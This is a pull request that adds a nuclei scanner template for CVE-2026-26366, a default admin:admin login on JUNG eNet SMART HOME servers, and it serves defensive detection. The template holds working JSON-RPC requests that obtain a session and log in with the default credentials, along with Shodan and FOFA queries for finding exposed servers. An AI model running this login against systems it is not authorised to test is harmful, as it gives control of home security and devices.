### PR TITLE
Add CVE-2026-26366: JUNG eNet SMART HOME Server Default Credentials

### DIFF
--- a/http/cves/2026/CVE-2026-26366.yaml
+++ b/http/cves/2026/CVE-2026-26366.yaml
@@ -1,0 +1,82 @@
+id: CVE-2026-26366
+
+info:
+  name: JUNG eNet SMART HOME Server - Default Credentials
+  author: optimus-fulcria
+  severity: critical
+  description: |
+    JUNG eNet SMART HOME server versions 2.2.1 and 2.3.1 ship with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change, allowing unauthenticated remote attackers to gain full administrative access to the smart home server.
+  impact: |
+    Unauthorized administrative access can lead to privacy violations through exposure of personal data and smart home usage patterns. Attackers can manipulate device configurations, disable security systems, or cause operational disruptions.
+  remediation: |
+    Change all default credentials on affected eNet SMART HOME servers to strong, unique passwords immediately. Employ network segmentation to isolate smart home servers from broader networks.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-26366
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5972.php
+    - https://www.vulncheck.com/advisories/jung-enet-smart-home-server-use-of-default-credentials
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-26366
+    cwe-id: CWE-1392
+  metadata:
+    verified: false
+    max-request: 2
+    shodan-query: title:"eNet SMART HOME"
+    fofa-query: title="eNet SMART HOME"
+  tags: cve,cve2026,jung,iot,default-login,smart-home
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /jsonrpc/management HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"getDigestAuthentificationInfos","params":null,"id":1}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"nonce"'
+          - '"realm"'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: kval
+        name: sessionid
+        kval:
+          - x_clientcredentials_sessionid
+        internal: true
+
+  - raw:
+      - |
+        POST /jsonrpc/management HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Cookie: INSTASESSIONID={{sessionid}}
+
+        {"jsonrpc":"2.0","method":"userLogin","params":{"userName":"admin","userPassword":"admin"},"id":2}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"result"'
+          - '"userName"'
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - '"error"'
+        negative: true
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Summary

Adds a nuclei template for CVE-2026-26366, which detects default credentials (admin:admin) in JUNG eNet SMART HOME Server versions 2.2.1 and 2.3.1.

## Details

- **CVE:** CVE-2026-26366
- **Severity:** Critical (CVSS 9.8)
- **CWE:** CWE-1392 (Use of Default Credentials)
- **Affected:** eNet SMART HOME Server 2.2.1 / 2.3.1

The eNet SMART HOME server ships with default credentials that remain active after installation without enforcing a mandatory password change. The template attempts to authenticate via JSON-RPC management endpoint with default admin:admin credentials.

## Detection Logic

1. First request fetches digest authentication information from `/jsonrpc/management` and extracts the session ID
2. Second request attempts login with default credentials (admin:admin) using the obtained session
3. Matches on successful authentication response containing user details

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-26366
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5972.php